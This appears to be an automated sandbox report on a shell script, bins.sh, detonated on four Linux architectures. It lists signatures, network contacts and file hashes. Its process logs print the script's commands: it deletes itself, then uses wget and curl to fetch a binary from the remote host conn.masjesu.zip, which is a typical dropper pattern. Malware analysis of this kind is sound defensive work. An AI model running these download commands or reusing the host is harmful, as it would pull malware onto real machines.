Malware Analysis Report

2025-05-28 20:29

Sample ID 241125-n31jtsvqdv
Target bins.sh
SHA256 d48a791f79ce65f71407a1ceeb21d49c644392c3c4d13b329334755a53ee96ad
Tags
discovery antivm
score
4/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
4/10

SHA256

d48a791f79ce65f71407a1ceeb21d49c644392c3c4d13b329334755a53ee96ad

Threat Level: Likely benign

The file bins.sh was found to be: Likely benign.

Malicious Activity Summary

discovery antivm

Checks CPU configuration

System Network Configuration Discovery

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 11:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 11:56

Reported

2024-11-25 11:58

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

131s

Command Line

[/tmp/bins.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-25 11:56

Reported

2024-11-25 11:58

Platform

debian9-armhf-20240418-en

Max time kernel

149s

Max time network

3s

Command Line

[/tmp/bins.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-25 11:56

Reported

2024-11-25 11:58

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS

MD5 cd3d4b9c643e5b473fb4d88ed05f0716
SHA1 64ee7a97418583d759eaea8000890cc3bae1b5f4
SHA256 0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512 164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-25 11:56

Reported

2024-11-25 11:58

Platform

debian9-mipsel-20240729-en

Max time kernel

150s

Max time network

150s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/mmb1HnxTDsnacGbEfipkfO4tHOYCepTXDS

MD5 cd3d4b9c643e5b473fb4d88ed05f0716
SHA1 64ee7a97418583d759eaea8000890cc3bae1b5f4
SHA256 0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512 164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52